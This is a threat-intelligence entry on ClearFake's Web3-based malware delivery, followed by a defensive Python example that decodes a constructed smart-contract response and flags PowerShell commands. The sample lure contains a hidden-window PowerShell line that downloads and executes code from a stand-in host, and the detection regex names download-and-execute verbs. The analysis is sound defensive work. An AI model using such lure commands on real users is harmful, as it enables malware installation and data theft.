ClearFake’s New Widespread Variant: Increased Web3 Exploitation for Malware Delivery
ID: 39a891d2-6937-5531-83ed-fe91fb6311f2
STIX ID: report--39a891d2-6937-5531-83ed-fe91fb6311f2
Feed Name: Sekoia.io Blog
Date Published: 2025-03-18
Date Updated: 2026-04-29
Author: Pierre Le Bourhis, Quentin Bourgue and Sekoia TDR
ClearFake is a malicious JavaScript framework deployed on compromised websites (primarily WordPress) to deliver malware through drive-by downloads. Its new variant leans on Web3: the injected script reads from smart contracts on the Binance Smart Chain ("EtherHiding") to retrieve the next-stage JavaScript, stored compressed and encoded, together with AES-encrypted lure pages. The lures imitate reCAPTCHA and Cloudflare Turnstile verification steps and trick the visitor into running a PowerShell command, which deploys the Emmenhtal loader and ultimately infostealers such as Lumma and Vidar. The report provides a detailed technical analysis, indicators of compromise (wallet addresses, smart contract ABIs, lure and payload URLs, PowerShell commands), and scripts to parse and decrypt the malicious artifacts.
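The retrieval chain the summary describes (contract read, ABI-encoded string, compressed and encoded JavaScript, lure with a PowerShell one-liner) can be worked through offline. The example below is added here and is not ClearFake's code nor the report's own parsing scripts: it ABI-decodes the `string` return value of a constructed JSON-RPC `eth_call` response, unpacks the payload, and flags the PowerShell command in the lure. The on-chain encoding (zlib then base64), the lure script, and the URL `example.invalid` are assumptions made for the example; the report's AES-encrypted lure layer is not reproduced.

```python
"""EtherHiding-style retrieval, worked through on constructed data.

Added example, not ClearFake's code. The zlib+base64 payload encoding and
the sample lure below are assumptions made for illustration only.
"""
import base64
import json
import re
import zlib

# Constructed lure script: a fake-verification page that copies a PowerShell
# one-liner to the clipboard for the visitor to paste. Not a real ClearFake lure.
SAMPLE_JS = (
    "document.body.innerHTML = '<h2>Verify you are human</h2>';\n"
    "const cmd = 'powershell -w hidden -c \"iwr http://example.invalid/x.txt | iex\"';\n"
    "navigator.clipboard.writeText(cmd);\n"
)


def abi_encode_string(data: bytes) -> str:
    """ABI-encode one dynamic `string`/`bytes` return value the way eth_call returns it:
    a 32-byte offset, a 32-byte length, then the data padded to a 32-byte boundary."""
    def word(n: int) -> bytes:
        return n.to_bytes(32, "big")
    padded = data + b"\x00" * (-len(data) % 32)
    return "0x" + (word(32) + word(len(data)) + padded).hex()


def abi_decode_string(hexdata: str) -> bytes:
    """Decode one dynamic `string`/`bytes` return value from an eth_call `result` field."""
    raw = bytes.fromhex(hexdata[2:] if hexdata.startswith("0x") else hexdata)
    offset = int.from_bytes(raw[0:32], "big")
    length = int.from_bytes(raw[offset:offset + 32], "big")
    if offset + 32 + length > len(raw):
        raise ValueError("truncated ABI string")
    return raw[offset + 32:offset + 32 + length]


def pack_payload(js: str) -> bytes:
    """Assumed on-chain encoding for this example: zlib-compressed, then base64."""
    return base64.b64encode(zlib.compress(js.encode()))


def unpack_payload(blob: bytes) -> str:
    """Reverse of pack_payload."""
    return zlib.decompress(base64.b64decode(blob)).decode()


# Constructed JSON-RPC response, shaped like a node's answer to eth_call against
# a contract whose view function returns the stored payload as a string.
SAMPLE_RPC_RESPONSE = json.dumps({
    "jsonrpc": "2.0",
    "id": 1,
    "result": abi_encode_string(pack_payload(SAMPLE_JS)),
})

# Heuristic for the kind of one-liner these lures ask the victim to run:
# a powershell invocation with a hidden window and/or a download-and-execute verb.
PS_PATTERN = re.compile(
    r"powershell(?:\.exe)?[^'\n]*?"
    r"(?:-w(?:indowstyle)?\s+hidden|iwr|invoke-webrequest|iex|invoke-expression|mshta)"
    r"[^'\n]*",
    re.IGNORECASE,
)


def find_powershell_commands(js: str) -> list[str]:
    """Return every PowerShell one-liner embedded in a lure script."""
    return [m.group(0).strip() for m in PS_PATTERN.finditer(js)]


def process_rpc_response(resp_json: str) -> tuple[str, list[str]]:
    """Full chain: eth_call result -> ABI string -> decoded JS -> flagged commands."""
    result = json.loads(resp_json)["result"]
    js = unpack_payload(abi_decode_string(result))
    return js, find_powershell_commands(js)


if __name__ == "__main__":
    script, commands = process_rpc_response(SAMPLE_RPC_RESPONSE)
    print(script)
    for c in commands:
        print("flagged:", c)
```

Against a real capture, `SAMPLE_RPC_RESPONSE` would be replaced by the node's answer to the `eth_call` the injected script issues, and the `unpack_payload` step by whatever decoding and AES decryption the report documents for the variant at hand; the ABI decoding and the command heuristic stay the same.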
